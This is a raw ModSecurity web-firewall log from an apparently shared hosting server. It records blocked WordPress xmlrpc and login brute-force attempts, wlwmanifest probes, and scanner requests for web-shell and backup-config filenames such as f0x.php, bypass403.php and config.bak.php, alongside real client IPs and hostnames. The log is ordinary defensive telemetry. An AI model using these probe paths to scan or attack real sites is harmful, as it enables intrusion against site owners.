[Tue May 26 15:55:27.032432 2026] [security2:error] [pid 745492:tid 745656] [client 34.23.113.84:53648] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "microlampworks.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahV1F4mEQglTmoWcfxKNcwAAAKQ"]
[Tue May 26 15:55:27.274383 2026] [security2:error] [pid 745492:tid 745722] [client 34.23.113.84:63560] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "microlampworks.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahV1F4mEQglTmoWcfxKNdQAAAOY"]
[Tue May 26 15:55:27.336090 2026] [security2:error] [pid 745492:tid 745629] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1FomEQglTmoWcfxKNcQAAAIk"]
[Tue May 26 15:55:27.610617 2026] [security2:error] [pid 745492:tid 745546] [remote 74.7.241.58:45698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahV1F4mEQglTmoWcfxKNfgAAxzI"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/wp-admin/includes
[Tue May 26 15:55:27.665967 2026] [security2:error] [pid 747840:tid 747972] [client 34.23.113.84:53405] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "microlampworks.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahV1F4m6MwAuYuZKxvkG2QAAAQw"]
[Tue May 26 15:55:27.742550 2026] [security2:error] [pid 745492:tid 745682] [client 103.153.130.62:60699] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1F4mEQglTmoWcfxKNfwAAAL4"]
[Tue May 26 15:55:27.742670 2026] [security2:error] [pid 745492:tid 745682] [client 103.153.130.62:60699] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1F4mEQglTmoWcfxKNfwAAAL4"]
[Tue May 26 15:55:29.252981 2026] [security2:error] [pid 747840:tid 748005] [client 103.44.52.196:58540] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1GYm6MwAuYuZKxvkG6AAAAS0"]
[Tue May 26 15:55:29.253142 2026] [security2:error] [pid 747840:tid 748005] [client 103.44.52.196:58540] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1GYm6MwAuYuZKxvkG6AAAAS0"]
[Tue May 26 15:55:30.074155 2026] [security2:error] [pid 745492:tid 745646] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1GYmEQglTmoWcfxKNlgAAAJo"]
[Tue May 26 15:55:30.384745 2026] [security2:error] [pid 745492:tid 745694] [client 62.60.130.233:61183] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.amslca.com"] [uri "/wp-login.php"] [unique_id "ahV1GomEQglTmoWcfxKNnwAAAMo"], referer: https://twitter.com/
[Tue May 26 15:55:30.723495 2026] [security2:error] [pid 745492:tid 745657] [client 62.60.130.233:54592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.amslca.com"] [uri "/wp-login.php"] [unique_id "ahV1GomEQglTmoWcfxKNqgAAAKU"]
[Tue May 26 15:55:31.448101 2026] [security2:error] [pid 747840:tid 748033] [client 31.57.184.107:60523] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-login.php"] [unique_id "ahV1G4m6MwAuYuZKxvkHCQAAAUk"]
[Tue May 26 15:55:31.760259 2026] [security2:error] [pid 747840:tid 748015] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1G4m6MwAuYuZKxvkHCAAAATc"]
[Tue May 26 15:55:31.957454 2026] [security2:error] [pid 747840:tid 748006] [client 31.57.184.107:61413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-login.php"] [unique_id "ahV1G4m6MwAuYuZKxvkHFQAAAS4"], referer: https://wordpress.org/
[Tue May 26 15:55:32.085261 2026] [security2:error] [pid 745492:tid 745668] [client 143.110.243.118:44378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/f0x.php"] [unique_id "ahV1HImEQglTmoWcfxKNuQAAALA"]
[Tue May 26 15:55:34.150707 2026] [security2:error] [pid 745492:tid 745662] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1HYmEQglTmoWcfxKNzAAAAKo"]
[Tue May 26 15:55:35.184277 2026] [security2:error] [pid 745492:tid 745680] [client 106.219.85.83:15094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1H4mEQglTmoWcfxKN5gAAALw"]
[Tue May 26 15:55:35.184543 2026] [security2:error] [pid 745492:tid 745680] [client 106.219.85.83:15094] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1H4mEQglTmoWcfxKN5gAAALw"]
[Tue May 26 15:55:36.312218 2026] [security2:error] [pid 745492:tid 745679] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1H4mEQglTmoWcfxKN7gAAALs"]
[Tue May 26 15:55:36.423631 2026] [security2:error] [pid 747840:tid 748034] [client 168.119.96.239:27804] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahV1H4m6MwAuYuZKxvkHQAAAAUo"], referer: https://thegoodsporting.com
[Tue May 26 15:55:38.170347 2026] [security2:error] [pid 747840:tid 748045] [client 103.153.130.62:60979] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1Iom6MwAuYuZKxvkHVgAAAVU"]
[Tue May 26 15:55:38.170514 2026] [security2:error] [pid 747840:tid 748045] [client 103.153.130.62:60979] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1Iom6MwAuYuZKxvkHVgAAAVU"]
[Tue May 26 15:55:38.354333 2026] [security2:error] [pid 747840:tid 748014] [client 143.110.243.118:52170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/config.bak.php"] [unique_id "ahV1Iom6MwAuYuZKxvkHXQAAATY"]
[Tue May 26 15:55:38.812646 2026] [security2:error] [pid 747840:tid 748064] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1Iom6MwAuYuZKxvkHXwAAAWg"]
[Tue May 26 15:55:39.637008 2026] [security2:error] [pid 747840:tid 747994] [client 103.44.52.196:52968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1I4m6MwAuYuZKxvkHdgAAASI"]
[Tue May 26 15:55:39.637116 2026] [security2:error] [pid 747840:tid 747994] [client 103.44.52.196:52968] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1I4m6MwAuYuZKxvkHdgAAASI"]
[Tue May 26 15:55:40.274207 2026] [autoindex:error] [pid 747840:tid 747983] [client 223.228.15.236:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/gallery/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/gallery
[Tue May 26 15:55:41.045177 2026] [security2:error] [pid 745492:tid 745708] [client 223.123.35.44:36265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1JImEQglTmoWcfxKOMAAAANg"]
[Tue May 26 15:55:41.045351 2026] [security2:error] [pid 745492:tid 745708] [client 223.123.35.44:36265] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1JImEQglTmoWcfxKOMAAAANg"]
[Tue May 26 15:55:42.537457 2026] [security2:error] [pid 745492:tid 745626] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1JomEQglTmoWcfxKOOwAAAIY"]
[Tue May 26 15:55:43.257200 2026] [security2:error] [pid 747840:tid 748097] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1Jom6MwAuYuZKxvkHtQAAAYk"]
[Tue May 26 15:55:44.356300 2026] [security2:error] [pid 747840:tid 748019] [client 113.172.115.167:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1J4m6MwAuYuZKxvkHzAAAATs"]
[Tue May 26 15:55:44.426487 2026] [security2:error] [pid 745492:tid 745639] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1J4mEQglTmoWcfxKOSwAAAJM"]
[Tue May 26 15:55:45.890174 2026] [security2:error] [pid 747840:tid 748072] [client 106.63.26.139:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahV1KYm6MwAuYuZKxvkH3gABcFg"], referer: http://www.kingsclub.in:8080/favicon.ico
[Tue May 26 15:55:45.933815 2026] [security2:error] [pid 747840:tid 748045] [client 106.219.85.83:3133] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1KYm6MwAuYuZKxvkH4gAAAVU"]
[Tue May 26 15:55:45.934700 2026] [security2:error] [pid 747840:tid 748045] [client 106.219.85.83:3133] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1KYm6MwAuYuZKxvkH4gAAAVU"]
[Tue May 26 15:55:46.052778 2026] [security2:error] [pid 747840:tid 748082] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1KYm6MwAuYuZKxvkH4AAAAXo"]
[Tue May 26 15:55:48.419535 2026] [security2:error] [pid 747840:tid 748074] [client 103.153.130.62:61255] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1LIm6MwAuYuZKxvkIAAAAAXI"]
[Tue May 26 15:55:48.419668 2026] [security2:error] [pid 747840:tid 748074] [client 103.153.130.62:61255] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1LIm6MwAuYuZKxvkIAAAAAXI"]
[Tue May 26 15:55:50.171318 2026] [security2:error] [pid 747840:tid 748043] [client 185.165.240.73:40645] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV1LYm6MwAuYuZKxvkIFQAAAVM"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 15:55:50.194972 2026] [security2:error] [pid 745492:tid 745719] [client 103.44.52.196:45754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1LomEQglTmoWcfxKOhwAAAOM"]
[Tue May 26 15:55:50.195095 2026] [security2:error] [pid 745492:tid 745719] [client 103.44.52.196:45754] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1LomEQglTmoWcfxKOhwAAAOM"]
[Tue May 26 15:55:50.650204 2026] [security2:error] [pid 747840:tid 748051] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1Lom6MwAuYuZKxvkIIwAAAVs"]
[Tue May 26 15:55:51.455889 2026] [security2:error] [pid 747840:tid 748024] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1L4m6MwAuYuZKxvkIMAAAAUA"]
[Tue May 26 15:55:52.577754 2026] [security2:error] [pid 747840:tid 748067] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1MIm6MwAuYuZKxvkISQAAAWs"]
[Tue May 26 15:55:54.539377 2026] [security2:error] [pid 745492:tid 745720] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1MomEQglTmoWcfxKOtgAAAOQ"]
[Tue May 26 15:55:56.701451 2026] [security2:error] [pid 745492:tid 745667] [client 106.219.85.83:28756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1NImEQglTmoWcfxKO2QAAAK8"]
[Tue May 26 15:55:56.701648 2026] [security2:error] [pid 745492:tid 745667] [client 106.219.85.83:28756] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1NImEQglTmoWcfxKO2QAAAK8"]
[Tue May 26 15:55:56.800258 2026] [security2:error] [pid 745492:tid 745669] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1NImEQglTmoWcfxKO0AAAALE"]
[Tue May 26 15:55:58.764156 2026] [security2:error] [pid 747840:tid 748011] [client 103.153.130.62:61531] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1Nom6MwAuYuZKxvkIpwAAATM"]
[Tue May 26 15:55:58.764272 2026] [security2:error] [pid 747840:tid 748011] [client 103.153.130.62:61531] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1Nom6MwAuYuZKxvkIpwAAATM"]
[Tue May 26 15:55:58.876679 2026] [security2:error] [pid 747840:tid 748037] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1Nom6MwAuYuZKxvkInQAAAU0"]
[Tue May 26 15:56:00.788744 2026] [security2:error] [pid 747840:tid 747991] [client 103.44.52.196:57472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1OIm6MwAuYuZKxvkIzwAAAR8"]
[Tue May 26 15:56:00.788873 2026] [security2:error] [pid 747840:tid 747991] [client 103.44.52.196:57472] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1OIm6MwAuYuZKxvkIzwAAAR8"]
[Tue May 26 15:56:01.038786 2026] [security2:error] [pid 747840:tid 748010] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1OIm6MwAuYuZKxvkIygAAATI"]
[Tue May 26 15:56:02.367592 2026] [security2:error] [pid 747840:tid 748093] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1OYm6MwAuYuZKxvkI6AAAAYU"]
[Tue May 26 15:56:02.685764 2026] [security2:error] [pid 747840:tid 747981] [client 77.68.83.86:54131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/images/images/cache.php"] [unique_id "ahV1Oom6MwAuYuZKxvkI9AAAARU"], referer: www.google.com
[Tue May 26 15:56:04.053124 2026] [security2:error] [pid 747840:tid 748056] [client 147.92.53.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1O4m6MwAuYuZKxvkJCwAAAWA"], referer: https://www.anujtradingco.com/
[Tue May 26 15:56:04.685487 2026] [security2:error] [pid 747840:tid 748000] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1PIm6MwAuYuZKxvkJEAAAASg"]
[Tue May 26 15:56:05.565441 2026] [security2:error] [pid 745492:tid 745733] [client 147.92.53.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1PYmEQglTmoWcfxKPHAAAAPE"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1250034&moderation-hash=604e564c2a35717c597f39933a421fd5
[Tue May 26 15:56:05.894918 2026] [security2:error] [pid 747840:tid 748071] [client 143.110.243.118:60342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/bypass403.php"] [unique_id "ahV1PYm6MwAuYuZKxvkJNgAAAW8"]
[Tue May 26 15:56:06.649143 2026] [security2:error] [pid 747840:tid 748084] [remote 106.63.26.157:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahV1OIm6MwAuYuZKxvkI1QABhm4"], referer: http://www.kingsclub.in:8080/sitemap.xml
[Tue May 26 15:56:07.024976 2026] [security2:error] [pid 747840:tid 748029] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1Pom6MwAuYuZKxvkJSgAAAUU"]
[Tue May 26 15:56:07.374012 2026] [security2:error] [pid 745492:tid 745715] [client 106.219.85.83:6192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1P4mEQglTmoWcfxKPMgAAAN8"]
